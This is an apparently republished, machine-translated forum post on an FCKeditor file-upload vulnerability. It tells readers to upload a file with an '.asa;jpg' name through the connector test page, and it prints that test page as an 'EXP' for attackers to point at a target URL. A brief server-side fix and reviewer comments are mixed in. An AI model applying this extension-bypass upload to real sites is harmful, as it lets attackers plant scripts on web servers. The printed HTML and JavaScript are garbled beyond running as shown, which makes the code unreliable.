Author: hackdn
Baidu hasn't found it. Just try again.
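FCKeditor upload vulnerability: fck/editor/filemanager/connectors/test.html
Upload a file named with the .asa;jpg suffix. The upload check evidently looks only at the last extension, so the fix belongs on the server: normalise the stored file name and make sure the upload directory cannot execute scripts.
If there is no test.html, save the following EXP and fill in the URL yourself.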
<! --
* FCKeditor-The text editor for Internet-http://www.fckeditor.net
* Copyright (C) 2003-2007 Frederico Caldeira Knabben
*
* = Begin license =
*
* Licensed under the terms of any of the following licenses at your
* Choice:
*
*-GNU General Public License Version 2 or later (the "GPL ")
* Http://www.gnu.org/licenses/gpl.html
*
*-GNU Lesser General Public License Version 2.1 or later (the "LGPL ")
* Http://www.gnu.org/licenses/lgpl.html
*
*-Mozilla Public License Version 1.1 or later (the "MPL ")
* Http://www.mozilla.org/MPL/MPL-1.1.html
*
* = End license =
*
* Test page for the File Browser connectors.
-->
<! Doctype html public "-// W3C // dtd html 4.0 Transitional // EN">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Title> FCKeditor-Connectors Tests </title>
<Script type = "text/javascript">
// Builds the connector request URL for one command.
// Takes the connector address from the element with id 'cmbconnector', then
// appends the command, the value of the element with id 'cmbtype' and the value
// of the element with id 'txtfolder' as the Command, Type and CurrentFolder
// query parameters. Returns the assembled string.
// NOTE(review): keyword casing and the stray spaces in this listing look like
// translation/extraction damage; as printed it is not valid JavaScript.
Function BuildBaseUrl (command)
{
Var sUrl =
Document. getElementById ('cmbconnector'). value +
'? Command = '+ command +
'& Type =' + document. getElementById ('cmbtype'). value +
// Only the folder value is URL-encoded; command and type are concatenated as-is.
'& CurrentFolder =' + encodeURIComponent (document. getElementById ('txtfolder'). value );
Return sUrl;
}
// Points the result element at a connector URL and displays that URL.
// Assigns `url` to the src of the element with id 'erunningframework'
// (presumably the result iframe in the page body; confirm against the markup)
// and writes the same string into the element with id 'url'.
// NOTE(review): the URL is displayed through innerHTML, so any markup inside it
// would be parsed as HTML; a text-only property is the safer way to show it.
Function SetFrameUrl (url)
{
Document. getElementById ('erunningframework'). src = url;
Document. getElementById ('url'). innerHTML = url;
}
// Issues the connector's folder-listing command for the current selection:
// builds the URL with BuildBaseUrl and hands it to SetFrameUrl.
// Always returns false. NOTE(review): presumably meant to cancel the link's
// default navigation, but the onclick attribute in the markup calls the
// function without returning its value; confirm.
Function GetFolders ()
{
SetFrameUrl (BuildBaseUrl ('getfolders '));
Return false;
}
// Issues the connector's combined folder-and-file listing command for the
// current selection: builds the URL with BuildBaseUrl and hands it to
// SetFrameUrl. Always returns false.
// Also called from OnUploadCompleted when an uploaded file has been renamed.
Function GetFoldersAndFiles ()
{
SetFrameUrl (BuildBaseUrl ('getfoldersandfiles '));
Return false;
}
// Asks the user for a folder name and issues the connector's create-folder
// command with it.
// Returns false in every path: immediately when the prompt yields an empty or
// cancelled value, otherwise after the request URL has been handed to
// SetFrameUrl.
Function CreateFolder ()
{
Var sFolder = prompt ('Type the folder name: ', 'test folder ');
// Nothing entered (or dialog cancelled): make no request.
If (! SFolder)
Return false;
Var sUrl = BuildBaseUrl ('createfolder ');
// The folder name is URL-encoded before it is appended as NewFolderName.
SUrl + = '& NewFolderName =' + encodeURIComponent (sFolder );
SetFrameUrl (sUrl );
Return false;
}
// Reports the outcome of a file upload to the user.
//   errorNumber  result code of the upload
//   fileName     name the file was stored under (used for code 201 only)
// NOTE(review): nothing in this listing calls this function; presumably it is
// invoked by script in the connector's upload response. The codes are therefore
// decided on the server; this page only displays them. Confirm against the
// connector.
Function OnUploadCompleted (errorNumber, fileName)
{
Switch (errorNumber)
{
// 0: upload accepted.
Case 0:
Alert ('file uploaded with no errors ');
Break;
// 201: name collision; the listing is refreshed and the new name is shown.
Case 201:
GetFoldersAndFiles ();
Alert ('a file with the same name is already available. The uploaded file has been renamed to "'+ fileName + '"');
Break;
// 202: the upload was reported as an invalid file.
Case 202:
Alert ('invalidfile ');
Break;
// Any other code is shown verbatim.
Default:
Alert ('error on file upload. Error number: '+ errorNumber );
Break;
}
}
// Registers this window object under frames.frmUpload.
// NOTE(review): presumably so that script returned by the connector can reach
// OnUploadCompleted through that name; the caller is not shown here, confirm
// against the connector's upload response.
This. frames. frmUpload = this;
// Prepares the upload form just before it is submitted (it is wired to the
// submit button's onclick in the markup).
// Builds the file-upload connector URL, displays it in the element with id
// 'url', and assigns it as the action of the element with id 'frmupload'.
// NOTE(review): the URL is displayed through innerHTML, so any markup inside it
// would be parsed as HTML; a text-only property is the safer way to show it.
Function SetAction ()
{
Var sUrl = BuildBaseUrl ('fileupload ');
Document. getElementById ('url'). innerHTML = sUrl;
Document. getElementById ('frmupload'). action = sUrl;
}
</Script>
</Head>
<Body>
<!-- Test harness UI for the file-browser connectors: a connector picker, a
     current-folder box and a resource-type picker, three command links, an
     upload form, and an iframe that displays whatever the connector returns.
     Every request made from here is an ordinary browser request; whether it is
     honoured is decided by the connector on the server, so authentication and
     file-name/extension checks have to be enforced there, and this test page
     should not ship with a deployed site. -->
<Table height = "100%" cellspacing = "0" cellpadding = "0" width = "100%" border = "0">
<Tr>
<Td>
<Table cellspacing = "0" cellpadding = "0" border = "0">
<Tr>
<Td>
<!-- Connector to talk to; the selected option value is the base of the request
     URL. NOTE(review): the ASP, ASP.Net and PHP values are garbled in this copy
     (stray spaces, a fragment of markup inside the attribute), and the host
     name in the first one was presumably added when the page was republished;
     the remaining options are relative connector paths. -->
Connector: <br/>
<Select id = "cmbConnector" name = "cmbConnector">
<Option value = "http://www.bkjia.com // fck/editor/filemanager/connectors/asp/connector. asp" selected = "selected"> ASP </option>
<Option value = "ASP. Net </option '> http: // fck/editor/filemanager/connectors/aspx/connector. asp"> ASP. Net </option>
<Option value = "cfm/connector. cfm"> ColdFusion </option>
<Option value = "lasso/connector. lasso"> Lasso </option>
<Option value = "perl/connector. cgi"> Perl </option>
<Option value = "PHP </option '> http: // fck/editor/filemanager/connectors/php/connector. php"> PHP </option>
<Option value = "py/connector. py"> Python </option>
</Select>
</Td>
<Td>
</Td>
<Td>
<!-- Folder the command applies to; defaults to the root "/". -->
Current Folder <br/>
<Input id = "txtFolder" type = "text" value = "/" name = "txtFolder"/> </td>
<Td>
</Td>
<Td>
<!-- Resource type sent with each request; "Invalid" is offered for testing how
     the connector handles a type it should refuse. -->
Resource Type <br/>
<Select id = "cmbType" name = "cmbType">
<Option value = "File" selected = "selected"> File </option>
<Option value = "Image"> Image </option>
<Option value = "Flash"> Flash </option>
<Option value = "Media"> Media </option>
<Option value = "Invalid"> Invalid Type (for testing) </option>
</Select>
</Td>
</Tr>
</Table>
<Br/>
<Table cellspacing = "0" cellpadding = "0" border = "0">
<Tr>
<!-- Command links: each calls its handler from an inline onclick; href="#" is
     only a placeholder target. -->
<Td valign = "top">
<A href = "#" onclick = "GetFolders ();"> Get Folders </a> </td>
<Td>
</Td>
<Td valign = "top">
<A href = "#" onclick = "GetFoldersAndFiles ();"> Get Folders and Files </a> </td>
<Td>
</Td>
<Td valign = "top">
<A href = "#" onclick = "CreateFolder ();"> Create Folder </a> </td>
<Td>
</Td>
<Td valign = "top">
<!-- Upload form: multipart POST of the NewFile field, with the response
     targeted at the eRunningFrame iframe. The action attribute is empty until
     the submit button's onclick runs SetAction(). -->
<Form id = "frmUpload" action = "" target = "eRunningFrame" method = "post" enctype = "multipart/form-data">
File Upload <br/>
<Input id = "txtFileUpload" type = "file" name = "NewFile"/>
<Input type = "submit" value = "Upload" onclick = "SetAction ();"/>
</Form>
</Td>
</Tr>
</Table>
<Br/>
<!-- Placeholder for displaying the request URL. -->
URL: <span id = "eUrl"> </span>
</Td>
</Tr>
<Tr>
<!-- NOTE(review): the next line is garbled in this copy; it was presumably the
     opening tag of the cell that holds the result iframe. -->
& Lt; td height = "100%" valign = "top" & gt;
<!-- Result frame; its src is a javascript: placeholder until a request is made. -->
<Iframe id = "eRunningFrame" src = "javascript: void (0)" name = "eRunningFrame" width = "100%"
Height = "100%"> </iframe>
</Td>
</Tr>
</Table>
</Body>
</Html>